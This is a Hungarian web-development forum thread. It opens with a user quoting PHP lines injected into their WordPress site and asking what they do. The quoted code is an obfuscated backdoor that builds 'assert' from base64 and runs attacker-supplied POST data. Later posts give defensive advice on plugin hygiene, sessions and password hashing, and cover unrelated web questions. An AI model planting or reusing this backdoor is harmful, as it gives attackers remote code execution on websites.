Új hozzászólás Aktív témák
-
Jinxb1rd
addikt
Sziasztok!
Wordpress honlapomon a Wordfence plugint jelzett egy változást az egyik fájlnál. Ezek a sorok lettek beszúrva. Szerintetek ez mit csinál?
<?php
$abc='http://'.$_SERVER['SERVER_NAME'].':'.$_SERVER["SERVER_PORT"].$_SERVER["REQUEST_URI"];
$tab1='abc11';
$c2=explode($tab1,$abc);
if(count($c2)>1){
$c=base64_decode('YXNzZXI=').$_GET[n].'t';@$c($_POST[x]);return;
}
?>We are only Stardust...
-
Phvhun
őstag
válasz lupus_l #15200 üzenetére
Egyébként ez mennyire gyakori probléma? Nincs valami ellenőrzés amikor feltölt valaki egy plugint a wordpress.org-ra?
Pont most lett feltörve egyik ismerősöm wp oldala, aki még csak nemrég kezdte az ipart.
Miután letörölte és elkezdte újra megcsinálni az oldalt, ránéztem, hogy mi okozhatta, és láttam hogy telepített egy olyan plugint, aminek csak 100 usere van. Én pl eddig direkt odafigyeltem rá hogy népszerűbb dolgokat használjak.
-
lupus_l
aktív tag
válasz Phvhun #15202 üzenetére
A wordpress.org-ra felkerült plugin/sablon esetében van ellenőrzés, leginkább a kétes forrásúaknál van probléma (warez, ingyenesnek ígért tartalom stb). De 1-1 biztonsági probléma mindig előfordul, ilyenkor a népszerűeket frissítik is.
Amilyen funkciót lehet, sablonon belül érdemes megoldani - kód vagy akár functions.php segítségével, viszont plugin esetén érdemes a frissítési állapotokat nézni vagy a felhasználók számát.
Védelemnél pedig nem árt a .htaccess (akár admin vagy wp-login.php IP-re korlátozásával) és a megfelelő CHMOD használata + bizonyos időszakonkénti automatikus backup. Persze a bizonyos időközönkénti rendszer és plugin frissítés is fontos. Rendszertől függetlenül paranoiásnak kell lenni.
Jinxb1rd: frissítsd amit lehet és nézd át, hogy min keresztül injektálták az exploitot.
[ Szerkesztve ]
-
Novics
senior tag
Üdv szakik!
Érdeklődnék, hogy hozzávetőlegesen - mondhatni nagyságrendileg - mennyibe kóstálna egy ehhez hasonló weboldal lefejlesztése, üzemeltetése.
(Különböző eladók tudnak regelni, az ő portékájukat lehet megvenni, van egy kis belső üzenetküldő rendszer, értékelhetik egymást a felek. Kb ennyi.) Tudom, hogy nem túl sok információ, de nagyon konkrét elképzelés sincsen, sőt, inkább csak kósza ötletként merült fel.A fontolva haladó. - 30 felett minden nap ajándék.
-
Novics
senior tag
Olvasgattam már a topikot, és én is azt mondtam az asszonynak - az ő fejében fogalmazódott meg a gondolat, mert a Meska kezd elqrvulni -, hogy milliós tétel, mivel azonban ehhez - sem - nem értek, íg megbecsülni sem tudom, hogy mi kell hozzá.
Az X mégis, kb mennyi? 2-3? 6-7?A fontolva haladó. - 30 felett minden nap ajándék.
-
biker
nagyúr
válasz Novics #15207 üzenetére
Attól függ, mi van a háttérben, pl ha rendelek 4 eladótol 6 dolgot, akkor lerendezi? + itt üzenetek, értekelés, stb
Egy mezei webshop megvan 100-ból (wp+woocommerce) de ez nem azElektromos autó töltő berendezések | Mesterséges növényvilágítás | Mai ajánlatunk: www.gerisoft.hu | www.e-autotoltokabel.hu | www.agrar-vilagitas.hu |
-
Novics
senior tag
Ez igazából egy közvetítő oldal az eladók és a vevők között. Nem igazi webshop. (Annyira én sem ismerem a háttér funkciókat, hogy pl magától leveszi a megvásárolt terméket, vagy az eladónak kell törölnie a saját termékei közül.) Talán-talán az ebayhez tudnám hasonlítani az oldalt. (Bár azt is csak vevőként ismerem.)
Na közben írt asszony. Ha megvesznek valamit, akkor a rendszer automatikusan átrakja az eladott termékek közé, és vonja a jutalékot a számláról.
A fontolva haladó. - 30 felett minden nap ajándék.
-
biker
nagyúr
válasz Novics #15209 üzenetére
láttam, megnéztem, tudom milyen jellegű oldal, anno terveztem ilyet, mert a saját webshopomba tettem fel több forgalmazó termékét, de aztán nem lett folytatva, mert az jött ki, hogy az eladók nem tudnak többfelé helytállni, és tutti, hogy egyrészt pakolja fel a saját cuccait a saját best-of eladási felületére, és a többit ritkán figyeli. innentől lehet, nálad elavult infók lesznek.
ez inkább mini ebay mint mega webshopElektromos autó töltő berendezések | Mesterséges növényvilágítás | Mai ajánlatunk: www.gerisoft.hu | www.e-autotoltokabel.hu | www.agrar-vilagitas.hu |
-
Flashback
addikt
Most egy komolyabb weboldalt csinálok, ahol fontos a biztonság.
Hogyan tároljam a felhasználói adatokat böngészés közben, úgy mint a privilégiumok, jelszó...Session mennyire biztonságos vagy egy cookie? Esetleg ezek MD5-el?
Mit javasolnátok?
Bocs nincs hosszú ö, ü és néha az á is ä :)
-
Phvhun
őstag
válasz Flashback #15211 üzenetére
Session biztonságos mivel a szerveren tárolódnak ezek az adatok.
Viszont van a session cookie, ami alapján a szerver azonosítja a látogatót, és ezt pl el lehet lopni.
Ez ellen érdemes session-ben tárolni a bejelentkezett user ip-jét, és user agentjét. Minden oldalbetöltéskor ezt ellenőrizd, és ha eltérés van akkor léptesd ki.
Ezen kívül remélem az adatbázisodat prepared statementekkel kérdezgeted le.
Más biztonsági dolog hirtelen nem jut eszembe.
-
GG888
senior tag
válasz Flashback #15211 üzenetére
A jelszót én nem tárolnám sehol, míg be van jelentkezve a user, csak bejelentkezésnél vizsgálnám.
+1 Phvhunnak a session sütis biztonságért.
Amit szerintem érdemes lehet elolvasni ebben a témában (hash, salting, stb.)https://crackstation.net/hashing-security.htm
Tudom, nem olyan magasröptű írás, de kezdésnek sokkal jobb, mint az MD5
pcmodding.hu | PC MODDING | Minden, ami modding, verhetetlen árak.
-
Flashback
addikt
válasz Phvhun #15212 üzenetére
Sessionben bíztam a leginkább ezt tudtam hogy a szerveren tárolódik de elég ha valaki elhelyez a szerón egy parancsot és már tudja is logolni a sessiont nem is kell hozzáférni a szerver többi részéhez. Ezért kérdeztem rá. Seesion Cookiet is programoztam már de az IP-t nem írtam bele pedig jó ötlet.
Logikailag akkor jobb ha:
Egyszer beléptetem és mondjuk egy booleanba rakom ezt be, a jelszót pedig többször ne is ellenőrizzem?randras: Pedig az adatbázisban a jelszókat úgy tároltam eddig. Tudom hogy egyszerű visszafejteni de mégis beletelik egy kis időbe. Mit javasolsz?
[ Szerkesztve ]
Bocs nincs hosszú ö, ü és néha az á is ä :)
-
Jinxb1rd
addikt
Tudtok valamit ajánlani, amivel át lehet nézetni a honlapok fájlait, hogy fertőződtek-e? Nem a sima víruskeresőre gondolok, hanem ami megnézi, hogy vannak-e kártékony programsorok a forrásokban.
We are only Stardust...
-
Jim-Y
veterán
válasz Flashback #15211 üzenetére
Böngészés közben neked nem kell ezeket letárolni. Ahogy a többiek is írták, session cookie-t kell generálnod belépéskor amit a böngésző el fog tárolni, nyílván beállítasz neki egy expiration time-ot ami az inaktivitás miatt kell. Ha teszem azt 5 percig nem csinál semmit a user akkor letelik a session cookie időtartama és kilépteted a usert, hogy autentikálja magát újra. A jelszavakat hashelve és saltolva KELL tárolnod és egy moder kriptográfiai algoritmust kell használnod. Jelenleg az Argon2 az ajánlott de minimum egy bcrypt. Én ajánlom, hogy opcionálisan tegyél elérhetővé 2 faktoros autentikációt is. Egy SMS validation-t összehozni tényleg nem nagy kunszt, elég egyszerű már manapság és mégis elég frankó feature
Ha az alapvető biztonsági dolgok iránt érdeklődsz akkor a minimum amit olvass el az az OWASP Top10 cheat sheet. Most ezt úgy kell nézni, hogy ide azok a sebezhetőségek vannak felsorolva amik manapság leginkább előfordulnak nem védett weboldalak esetén. Ezekkel érdemes foglalkozni. Pl látod, hogy az első a listában az Injection, akkor erről tudsz bővebben már olvasni, hogy hogyan lehet ellene védekezni. Pl SQL Injection ellen prepared statementekkel, meg input sanitizationnel stb..
Amikor a user beírja a jelszavát, vagy regisztrál akkor ezeket a credentialöket SSL-en keresztül kell a szerverre eljuttatni és ott rögtön hashelni kell.
Linkek:
https://www.owasp.org/index.php/Session_Management_Cheat_Sheet
https://www.owasp.org/index.php/Authentication_Cheat_Sheet -
Jim-Y
veterán
válasz Flashback #15215 üzenetére
Feltételezni kell, hogy a szervered biztonságos, meg hát azt is védeni kell, nyílván ha te a tárhelyet csak béreled akkor ennek a védelme nem a te felelősséged, más esetben igen. Session hijacking -> [link]
Logikailag akkor jobb ha:
Egyszer beléptetem és mondjuk egy booleanba rakom ezt be, a jelszót pedig többször ne is ellenőrizzem?Nem, authentikáció után a szerveren csinálsz egy session-t a usernek, majd csinálsz egy middleware-t ami minden a frontendről jövő kérés esetén lefut és ellenőrzi a session érvényességét, nem járt-e le, megegyezik a session token stb..
Az MD5-el az a baj, hogy régen elavult, és ha a jelszavak véletlenül kikerülnének a világba, akkor a másodperc tört része alatt feltörik azt, egész egyszerűen már nem elég biztonságos.
[ Szerkesztve ]
-
margithid
veterán
Sziasztok!
Meta tagot, hogy kell beilleszteni weboldalba hogy jó legyen? -
Gergello
addikt
Láttatok mostanában olyan webshopot, ahol kifejezetten jól van megoldva a szállítási és fizetési mód kiválasztása ?
Nálam egy webshopban van egy közepes megoldás, szeretnék rajta javítani ha lehet.
Egylapos (one page checkout) kialakítású a rendelés elküldése felület, a többi része szerintem nagyon rendben van. Most csak a a száll. fiz módról rakok be képeket.
Az oldal logikája szerint a szállítási és fizetési mód egy elemként van kezelve, de persze ezen lehet változtatni.Így néz ki alapból:
Így amikor a rendelés értéke elérte az ingyenes szállítás határértékét:
Az a baj, hogyha már bejön még 1-2 fizetési mód (halasztott utalás, valamelyik üzletben történő átvétel), akkor már nagyon sok sor lenne.
Lehet jó lenne 2 hasábra bontani és valahogy ajax-szal frissítgetni kiválasztás/összérték alapján, de nem szeretném túlbonyolítani se.
Szerintetek ?
-
snake1977
őstag
Sziasztok, ide hogy tud egy oldal felkerülni, mit kell tenni hogy ha rákeresnek, akkor itt oldalt megjelenjen?
Példálul mint ezen a képen.
(Bocsi de ebben roppantmód járatlan vagyok)[ Szerkesztve ]
...BRSZK...9...2024.06.28-29... / www.brszk.hu / www.www.tiktok.com/@brszk_official / https://www.youtube.com/@BRSZK-Official
-
Flashback
addikt
Pár biztonsági kérdést feszegető oldalt átolvastam. Kérlek javítsatok ki hogyha hibás a gondolatmenetem! Szóval amit kitaláltam:
- Generálok egy key-t egy bivaj erős saltból + user jelszó kombinációjából, egy biztonságosnak írt metódussal.
- Ezt a keyt lerakom a usernél cookiban
- Adatbázisban tárolom a keyhez tartozó saltot az ipt és a lejárati időt de magát a keyt nem.Mikor feljön az oldalra akkor ellenörzöm a keyt a salt segítségével. Ha egyezik az ip és a lejárati idő is jó újra beléptetem. Egyszerre 2 ip használatát engedélyezném. Mobilnet és vezetékes kombót használják a legtöbben.
Bocs nincs hosszú ö, ü és néha az á is ä :)
-
Jim-Y
veterán
-
Jim-Y
veterán
válasz Flashback #15234 üzenetére
Szia.
Nem tudom, hogy multkor irtam-e, vagy csak akartam, de az nagyon rossz irany, hogy a jelszot leakeled a felhasznalonak. A jelszonak egy olyan erteknek kell lennie ami csakis kizarolag szellemi "tulajdon". Ertem ezalatt, hogy a jelszo egy, a felhasznalo elmejeben letezo kodsor amivel valamilyen szinten biztonsagosan azonositani tudja magat. A vedelem egyik alappillere, hogy ezt te titkositott csatornan kuldod el a szervernek, ott rogton tikositod ugy, hogy azt visszafejteni nagyon nagyon nehez, vagy nagyon sok ido legyen, es hat elmeletileg veded a szervert, hogy ne jusson ki a jelszo egy esetleges harmadik felhez. Na mar most ha te elhasheled a jelszavat es kikuldod neki a bongeszojebe akkor mar egybol leakelted is az informaciot. Ez bad pattern. Helyette...
En ez alapjan csinaltam hasonlot: [link]
Zanzasitva:
Ad1: "Would you believe that there are still web programmers that use fast cryptographic hash functions such as MD5 and SHA1 for password storage in 2015? It has been clear to security experts for a long time that this is a bad idea"
Ajanlottak:
Argon2 (winner of the Password Hashing Competition)
bcrypt
scrypt
PBKDF2 (Password-Based Key Derivation Function #2)Ad2: maga a remmeber-me
The automatic login algorithm looks something like:
1 Separate selector from validator.
2 Grab the row in auth_tokens for the given selector. If none is found, abort.
3 Hash the validator provided by the user's cookie with SHA-256.
4 Compare the SHA-256 hash we generated with the hash stored in the database, using hash_equals().
5 If step 4 passes, associate the current session with the appropriate user ID.En meg megfejelnem ezt azzal, hogy mondjuk fakultativan tudna a user kapcsolni, hogy o egy secure-account 2FA-al es igy Minden belepesnel kuldene egy auth-tokent SMS-ben. Nem lenne ez kivetel a remember-me-nel sem.
-
Melack
veterán
Üdvözletem! Kellene egy családi receptes honlap feleségemnek és anyósomnak. A Telekom tárhelye 50Mb. Erre melyik weblapkezelő motor lenne a legalkalmasabb, ami kevés helyet is foglal? Annyi kikötés van, hogy ne csak a tagekben keressen, ha úgy van, hanem a teljes szövegben (akár kifejezésre is). Köszönöm!
Ex-Informatikai Szolgáltató Asztali Munkatárs
-
Phvhun
őstag
Sikerült kiszenvednem magamból egy ilyen SQL-t egyik meló közben, gondoltam megmutatom csak menőzés képpen.
SELECT
DATE_ADD(`users`.`regtime`, INTERVAL 6 HOUR) AS `Registration Date`,
`users`.`full_name` AS `Customer Name`,
IFNULL(SUM( `computers`.`computer_state` LIKE 'running'),0) AS `Nodes Running`,
IFNULL(SUM( `computers`.`computer_state` LIKE 'stopped'),0) AS `Nodes Stopped`,
COUNT(`computers`.`id`) AS `Total Nodes`,
IFNULL(DATE_ADD(FROM_UNIXTIME(MAX(`computers`.`time`)), INTERVAL 6 HOUR),'never') AS `Latest Node Activity`,
`M`.`Commands Issued`,
`M`.`Last Dashboard Command Time`
FROM
`rnm`.`users`
LEFT JOIN `rnm`.`computers`
ON (`computers`.`user_id` = `users`.`user_id`)
LEFT JOIN (SELECT
`users`.`user_id`,
COUNT(`log`.`msg`) AS `Commands Issued`,
IFNULL(DATE_ADD(FROM_UNIXTIME(MAX(`log`.`time`)), INTERVAL 6 HOUR),'never') AS `Last Dashboard Command Time`
FROM
`rnm`.`users`
LEFT JOIN `rnm`.`log`
ON (`users`.`user_id` = `log`.`user_id` AND `log`.`msg` LIKE '%controlform_submit%')
GROUP BY `users`.`user_id`
ORDER BY MAX(`log`.`time`) DESC, `users`.`full_name`
) `M` ON `M`.`user_id` = `users`.`user_id`
GROUP BY `users`.`user_id`
ORDER BY `users`.`regtime` ASC; -
randras
veterán
Szeretném, ha a mobil eszköz landscape módba forgatásakor
<meta name='viewport' content='width=device-width, initial-scale=1.0'>
kerülne az oldal fejébe, portrait módban pedig visszaállna az alapállapotba.
Jelenleg így áll:
...
<meta name='viewport' content=''>
...
jQuery(document).ready(function() {
if(jQuery.browser.mobile) {
jQueryMobile(window).on("orientationchange",function(){
if(window.orientation != 0) {
rotationSwitcher("landscape");
}
else {
rotationSwitcher("portrait");
}
});
}
});
...
function rotationSwitcher(mode) {
switch(mode) {
case "landscape":
jQuery('meta[name="viewport"]').attr('content','');
break;
case "portrait":
jQuery('meta[name="viewport"]').attr('content','width=device-width, initial-scale=1.0');
break;
}
}iPhone SE-n iOS 9.3 alatt Opera Coast, Opera Mini és Firefox alatt tökéletes, Safari és Chrome alatt kb 10 oldalbetöltésből 1-szer működik az eredeti állapot visszaállítasa elforgatás után, és akkoris csak elsőre, szóval ha visszaállok portrait módba, majd megint landscape-be, már nem jó. Valakinek van valami ötlete?
-
fordfairlane
veterán
válasz randras #15240 üzenetére
Valakinek van valami ötlete?
Hát, leginkább ne így használd a viewport beállítást. Persze el lehet kezdeni debuggolni, hogy esetleg az "orientationchange" event nem fut le a problémás böngészőkben, vagy inkább az nem tetszik nekik, hogy a meta viewport tag contentjét nem üresre kéne visszaállítani, de, dióhéjban, a viewportot úgy szokás használni, hogy width=device-width, initial-scale=1 beállítást responsive oldalon használjuk. Ez a scriptből állítgatás eléggé ugly hack szagú.
x gon' give it to ya
-
randras
veterán
válasz fordfairlane #15241 üzenetére
Sajnos a landscape módban megjelenítendő tartalom nem reszponzív.
-
biker
nagyúr
Van valakinek tippje arra, hogy értelmesen menjen a google mobilbarát ellenőr?
van egy sablon, aminél a felső slidert (parallax persze a lap) úgy tekinti, mint egész képernyős reklám ami kitakar egy tartalmat
lásd itt is
WTF???
Persze a kész landing pageben lévő képekre is azt mondja a page insights, a 890kb-os png screenshotra, 1600x1200, hogy még 810kb tömöríthető rajta. persze, ha 320x240 lenne, talánElektromos autó töltő berendezések | Mesterséges növényvilágítás | Mai ajánlatunk: www.gerisoft.hu | www.e-autotoltokabel.hu | www.agrar-vilagitas.hu |
-
Salex1
senior tag
Sziasztok! Van itt valaki aki vállalná egy WIX-en lévő oldal megírását? Nem kell bonyolultra gondolni, csak egy lapos, legörgethető oldal, ahol van egymás alatt, egy leírás, egy portfólió pár képpel és egy elérhetőség az alján (én sem gondolnék túl nagy összegre).
-
kocsisdavid5
aktív tag
Sziasztok! Van egy projektem, amit természetesen git segítségével készítek. Van egy develop és egy master ágam, amiben vannak olyan fájlok amik ugyan azok mind kettő ágban, és vannak olyanok amik különböznek kicsit. Megolható, hogy csak egy fájlt mergeljek át az egyik ágból a másikba?
-
weiss
addikt
válasz kocsisdavid5 #15246 üzenetére
Automatikusan nem hinném, de mikor összemergeled a két ágat, akkor kézzel lecseréled a fájlokat és csak utána commitolsz.
I did nothing, the pavement was his enemy!
-
Salex1
senior tag
Mi a neve annak a Kép-elhelyezésnek, amikor a egy kép gördül, de csak a képernyő tetejéig, ott megáll, és a következő blokk ráfut, mintha háttérkép lenne. Remélem érthető, ha nem, akkor itt látható
Meg lehet ezt írni HTML-ben?[ Szerkesztve ]
Új hozzászólás Aktív témák
- Autós topik látogatók beszélgetős, offolós topikja
- Otthoni hálózat és internet megosztás
- Magisk
- Star Citizen
- Garancia kérdés, fogyasztóvédelem
- OLED TV topic
- Hogy is néznek ki a gépeink?
- Azonnali informatikai kérdések órája
- Mobilinternet
- D1Rect: Nagy "hülyétkapokazapróktól" topik
- További aktív témák...
- Új iPhone 15 Pro Max 512GB Független, Natur Titán
- Aspire VX5 591G 15.6" FHD IPS i5-7300HQ GTX 1050 16GB 500GB NVMe +1TB HDD magyar vbill gar
- Samsung Galaxy S21 FE 5G DS (6GB+128GB) Graphite
- VivoBook M515DAP 15.6" FHD Ryzen 3250U 12GB 256GB NVMe magyar vbill., gar
- Synology BeeStation 4TB NAS (Hálózati Tároló)